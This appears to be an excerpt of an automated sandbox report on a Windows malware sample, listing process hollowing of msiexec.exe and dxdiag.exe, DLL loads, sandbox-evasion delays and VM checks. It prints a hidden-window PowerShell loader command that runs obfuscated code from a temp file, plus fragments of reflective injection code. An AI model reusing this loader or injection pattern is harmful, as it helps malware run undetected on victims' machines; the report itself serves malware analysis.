Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: MPkM9Dd99B.exe | Static file information: File size 1352888 > 1048576
Source: MPkM9Dd99B.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((subsocially $Falkeblikkenes $tankbilernes), (embedernes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Krampetrkningen = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Prmie)), $Pindemadderne).DefineDynamicModule($Kaleidoscopical, $false).DefineType($Copart201, $Surmlksproduktets, [System.MulticastDel
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | File created: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6346
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3297
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2100 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 6712 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\SIHClient.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 identical entries)
Source: C:\Windows\System32\SIHClient.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 identical entries)
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | Code function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: SIHClient.exe, 00000004.00000003.2001113452.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1617302451.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1616533249.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2000899263.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2002280733.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1619803008.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1620494229.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWs
Source: SIHClient.exe, 00000004.00000003.2001113452.00000220B1F76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2001113452.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1617302451.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1616533249.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2000899263.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2002280733.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2002280733.00000220B1F76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1619803008.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2000899263.00000220B1F76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1620494229.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\MPkM9Dd99B.exe | API call chain: ExitProcess graph end node graph_0-3695
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
